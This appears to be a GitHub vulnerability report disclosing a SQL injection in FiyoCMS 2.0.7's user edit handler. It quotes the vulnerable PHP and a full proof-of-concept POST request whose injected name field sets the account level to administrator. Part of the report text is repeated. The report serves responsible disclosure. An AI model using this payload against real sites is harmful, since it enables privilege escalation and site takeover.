Good day.
I found an update type of SQL injection vulnerability in the FiyoCMS 2.0.7.This vulnerability can lead to normal user privileges elevated to administrator privileges.
the vulnerability lies in /apps/app_user/sys_user.php
if(isset($_POST['edit'])){
if(!empty($_POST['email']) AND @ereg("^.+@.+\\..+$",$_POST['email']))
{
$qrq = false;
$_POST['bio'] = htmlentities($_POST['bio']);
if(empty($_POST['password']) AND empty($_POST['kpassword'])){
$qrq=$db->update(FDBPrefix.'user',array(
"name"=>"$_POST[name]",
"email"=>"$_POST[email]",
"about"=>"$_POST[bio]"),
"id=$_SESSION[USER_ID]");
}
it can be noticed that these two parameters $_POST[name] $_POST[email] were taken directly into the database query.
poc
POST /www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 139
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/user/edit
Accept-Language: zh-CN,zh;q=0.8
Cookie: UM_distinctid=15f6d54e23f539-0723e5e4ddab84-5c153e17-100200-15f6d54e240a17; CNZZDATA1260798858=709893868-1509454193-http%253A%252F%252F127.0.0.1%252F%7C1509803835; PHPSESSID=8d82fdb9a681a4b55ed56fcf8df8fe42
Connection: close
password=&kpassword=&name=xm001",`email`="xxxx@gmail.com",`about`="test",level=1 WHERE id=2%23&email=xxxxx%40gmail.com&bio=wers&edit=Simpan
then you can get into Backstage
I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered:
Good day.
I found an update type of SQL injection vulnerability in the FiyoCMS 2.0.7.This vulnerability can lead to normal user privileges elevated to administrator privileges.
the vulnerability lies in /apps/app_user/sys_user.php
it can be noticed that these two parameters $_POST[name] $_POST[email] were taken directly into the database query.

poc
then you can get into Backstage

I hope you can fix it as soon as possible,if there are any questions, please send me the details to my email at xm001test@gmail.com
The text was updated successfully, but these errors were encountered: